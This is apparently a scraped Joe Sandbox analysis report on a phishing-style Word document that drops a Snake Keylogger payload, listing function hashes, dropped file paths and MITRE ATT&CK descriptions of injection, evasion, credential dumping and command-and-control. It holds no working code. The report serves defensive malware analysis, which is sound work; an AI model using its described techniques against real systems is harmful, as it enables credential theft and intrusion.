Source File: 00000006.00000002.610526132.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_16d000_mpoom39002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1dbffdbda5c9c8edcfc78581d8c5b5b2f1002de123f9ca2ac36603b22506640
Instruction ID: f207e55360f9c669e334706274da970dd217a81226a14a9fea5356604f0e82d0
Opcode Fuzzy Hash: f1dbffdbda5c9c8edcfc78581d8c5b5b2f1002de123f9ca2ac36603b22506640
Instruction Fuzzy Hash: AA21B075A04340DFDB14DF14EDC4B26BB65EB84314F34C5A9E8494B246C33AD867CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0016D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.610526132.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_16d000_mpoom39002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d901ba2131a10237530b1c378adfcf47bd133f4bf10198aaa990114cc4e6c31a
Instruction ID: 6baf45fdc843e4dd6cbc2bc20099be3736944573ad89ae7abc89654c5beb6630
Opcode Fuzzy Hash: d901ba2131a10237530b1c378adfcf47bd133f4bf10198aaa990114cc4e6c31a
Instruction Fuzzy Hash: 1F217C755093808FDB02CF24D994B15BF71EB46314F28C5EAD8498B2A7C33A981ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001F47FD Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc4165498654a4c3032e021ba7daca6de984eb1dfb03a2bdb161f2ffa5ffb5f
Instruction ID: cf29c8e269fb4b25645e25c39d2c2fd6c29bb44fbc1532592aa83aff80952b4b
Opcode Fuzzy Hash: fcc4165498654a4c3032e021ba7daca6de984eb1dfb03a2bdb161f2ffa5ffb5f
Instruction Fuzzy Hash: C652B274E002288FDB64DF64C884BEEBBB2BF89304F1485EAD549A7255D734AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F6458 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3add45daaea693500b583e880405e3b61dcd66826297c589dac8a56b4915a7f
Instruction ID: 667f7b91be66f111ec4c95876e6a78797fe8d7d9ca76079dc598ff61f65ec5e2
Opcode Fuzzy Hash: b3add45daaea693500b583e880405e3b61dcd66826297c589dac8a56b4915a7f
Instruction Fuzzy Hash: 54B1A974E00218CFDB54DFA5D894A9DBBB2FF88310F2081AAD819AB365DB31AD45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001F4162 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858d238b034aa38c6a7cf995846051c16ece7cf59b15f3138fe409c635b7123e
Instruction ID: 216ea21214edd5ecf563bb903eeb1827cad84189adcbfc17b4861c51140ec0a0
Opcode Fuzzy Hash: 858d238b034aa38c6a7cf995846051c16ece7cf59b15f3138fe409c635b7123e
Instruction Fuzzy Hash: 09A19F74A05228CFDB64DF24C894BAEBBB2BF4A300F5085EAD50DA7250DB319E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 003F644A Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4c7fbf8149ecb09844b0d7cec330642b6a1b2cefb090b5f740847ff68e37cd2
Instruction ID: 47f8d995d9a5b8e3f04ff7bb76ae227b63fb75b1a988440849615cca64b0e98d
Opcode Fuzzy Hash: a4c7fbf8149ecb09844b0d7cec330642b6a1b2cefb090b5f740847ff68e37cd2
Instruction Fuzzy Hash: E6519674E00648CFDB48DFAAD89599DBBF2BF89300F24816AD419AB365DB349946CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001F4342 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f23a0ddc87423d56ecf3b01459ceb12c0b90dd5a7153195cb7d562d28a5387
Instruction ID: 4ebbe4b7b19f3244aed8aec135a7354af2c31e5ce1e01c505f557e6599034c06
Opcode Fuzzy Hash: d1f23a0ddc87423d56ecf3b01459ceb12c0b90dd5a7153195cb7d562d28a5387
Instruction Fuzzy Hash: 1E517074A05228CFCB65DF24D854BAEB7B2BF4A305F5085EAD409A7264CB31AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F676E Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea4b88c322dd4f460db643fa5957f902a8a59c25abe51edd844b96016d5aa67
Instruction ID: ca76e431c508328d8415e0027bdc75bf5f96aa9678f9388f85b177c142766720
Opcode Fuzzy Hash: bea4b88c322dd4f460db643fa5957f902a8a59c25abe51edd844b96016d5aa67
Instruction Fuzzy Hash: 30D09E38D14358DBCF10DF95D9557BDF3B6FB45204F2024A5C108B7600DB305E548A46

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net .
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2F038898-13C8-4096-9A4F-B491A2488798}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{46F363FE-A7DD-406F-B1C8-7F7D7988C666}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B7378A9E-77CE-4569-96A5-44AF778C0CBC}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C64928E2-7CB9-43A4-ADFC-459F6DAC0FA3}.tmp

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\mpoom39002.scr

C:\Users\user\Desktop\~$THACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc

Static File Info

General

File Icon

Windows Analysis Report
ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc

Function 001E3908 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118
injectionCOMMON

Function 001E4868 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Function 001E3910 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Function 001E3A60 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Function 001E3A68 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Function 001E4C98 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 001E37E8 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Function 001E3B88 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Function 001F3B30 Relevance: 1.8, Strings: 1, Instructions: 596
COMMON

Function 001F51C1 Relevance: 1.8, APIs: 1, Instructions: 274
libraryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre